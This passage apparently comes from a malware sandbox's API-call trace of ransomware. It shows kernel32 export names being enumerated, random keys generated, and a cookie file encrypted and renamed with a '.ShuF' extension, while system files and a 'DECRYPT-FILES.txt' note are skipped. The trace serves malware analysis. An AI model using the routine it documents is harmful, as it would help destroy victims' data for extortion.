(lpString="DEACTIVATEACTCTX") returned 16 [0078.815] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0078.815] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0078.815] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0078.815] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0078.815] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0078.815] lstrlenA (lpString="DEBUGBREAK") returned 10 [0078.815] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0078.815] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0078.815] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0078.815] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0078.815] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0078.815] lstrlenA (lpString="DECODEPOINTER") returned 13 [0078.815] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0078.815] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0078.815] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0078.815] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0078.815] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0078.815] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0078.815] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0078.815] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0078.816] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0078.816] lstrlenA (lpString="DELETEATOM") returned 10 [0078.816] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0078.816] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0078.816] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0078.816] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0078.816] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0078.816] lstrlenA (lpString="DELETEFIBER") returned 11 [0078.816] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0078.816] lstrlenA (lpString="DELETEFILEA") returned 11 [0078.816] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0078.816] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0078.816] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0078.816] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0078.816] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0078.816] lstrlenA (lpString="DELETEFILEW") returned 11 [0078.816] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0078.816] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0078.816] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0078.816] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0078.816] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0078.816] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0078.816] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0078.816] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0078.816] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0078.816] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0078.816] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0078.816] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0078.816] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0078.816] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0078.816] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0078.816] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0078.816] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0078.816] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0078.816] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0078.816] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0078.816] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0078.816] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0078.817] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0078.817] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0078.817] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0078.817] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0078.817] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0078.817] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0078.817] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0078.817] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0078.817] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0078.817] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0078.817] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0078.817] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0078.817] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0078.817] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0078.817] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0078.817] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0078.817] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0078.817] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0078.817] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0078.817] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0078.817] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0078.817] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0078.817] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0078.817] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0078.817] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0078.817] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0078.817] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0078.817] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0078.817] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0078.817] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0078.817] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0078.817] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0078.817] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0078.817] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0078.817] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0078.817] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0078.817] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0078.818] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0078.818] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0078.818] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0078.818] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0078.818] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0078.818] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0078.818] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0078.818] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0078.818] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0078.818] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt") returned 105 [0078.818] wsprintfW (in: param_1=0x3f2d730, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt.ShuF") returned 110 [0078.818] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt.ShuF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt.shuf"), dwFlags=0x0) returned 1 [0078.819] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.819] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.819] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.819] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1d8f4d50, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0x1e658910, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1e658910, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0xf1, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@demdex[1].txt", cAlternateFileName="5PFFE8~1.TXT")) returned 1 [0078.820] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@demdex[1].txt", lpString2="DECRYPT-FILES.txt") returned -1 [0078.820] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@demdex[1].txt", lpString2="autorun.inf") returned -1 [0078.820] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@demdex[1].txt", lpString2="boot.ini") returned -1 [0078.820] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@demdex[1].txt", lpString2="desktop.ini") returned -1 [0078.820] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@demdex[1].txt", lpString2="ntuser.dat") returned -1 [0078.820] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@demdex[1].txt", lpString2="iconcache.db") returned -1 [0078.820] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@demdex[1].txt", lpString2="bootsect.bak") returned -1 [0078.820] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@demdex[1].txt", lpString2="ntuser.dat.log") returned -1 [0078.820] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@demdex[1].txt", lpString2="thumbs.db") returned -1 [0078.820] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@demdex[1].txt", lpString2="Bootfont.bin") returned -1 [0078.820] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@demdex[1].txt") returned 34 [0078.820] lstrcmpiW (lpString1="txt", lpString2="lnk") returned 1 [0078.820] lstrcmpiW (lpString1="txt", lpString2="exe") returned 1 [0078.820] lstrcmpiW (lpString1="txt", lpString2="sys") returned 1 [0078.820] lstrcmpiW (lpString1="txt", lpString2="dll") returned 1 [0078.820] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 72 [0078.820] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@demdex[1].txt") returned 34 [0078.820] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\" [0078.820] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpString2="5p5nrgjn0js_halpmcxz@demdex[1].txt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt" [0078.820] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.820] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x458 [0078.822] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x3f2d6f8 | out: lpFileSize=0x3f2d6f8*=241) returned 1 [0078.822] CreateFileMappingW (hFile=0x458, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x45c [0078.822] MapViewOfFile (hFileMappingObject=0x45c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0078.822] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0078.822] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0078.822] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.824] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x100) returned 1 [0078.824] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0078.824] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.824] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0078.825] CloseHandle (hObject=0x45c) returned 1 [0078.825] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.825] WriteFile (in: hFile=0x458, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d680, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d680*=0x108, lpOverlapped=0x0) returned 1 [0078.826] CloseHandle (hObject=0x0) returned 0 [0078.826] CloseHandle (hObject=0x458) returned 1 [0078.826] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.826] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.827] GetTickCount () returned 0x114c340 [0078.827] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.827] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0078.827] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0078.827] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.827] lstrlenA (lpString="kernel32.dll") returned 12 [0078.828] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0078.828] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0078.828] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0078.828] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0078.828] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0078.828] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0078.828] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0078.828] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0078.828] lstrlenA (lpString="ADDATOMA") returned 8 [0078.828] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0078.828] lstrlenA (lpString="ADDATOMW") returned 8 [0078.828] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0078.828] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0078.828] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0078.828] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0078.828] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0078.828] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0078.828] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0078.828] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0078.828] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0078.828] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0078.828] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0078.828] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0078.828] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0078.828] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0078.828] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0078.828] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0078.828] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0078.828] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0078.828] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0078.829] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0078.829] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0078.829] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0078.829] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0078.829] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0078.829] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0078.829] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0078.829] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0078.829] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0078.829] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0078.829] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0078.829] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0078.829] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0078.829] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0078.829] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0078.829] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0078.829] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0078.829] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0078.829] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0078.829] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0078.829] lstrlenA (lpString="BACKUPREAD") returned 10 [0078.829] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0078.829] lstrlenA (lpString="BACKUPSEEK") returned 10 [0078.829] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0078.829] lstrlenA (lpString="BACKUPWRITE") returned 11 [0078.829] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0078.829] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0078.829] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0078.829] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0078.829] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0078.829] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0078.829] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0078.829] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0078.829] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0078.829] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0078.829] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0078.830] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0078.830] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFlushAppcompatCache" | 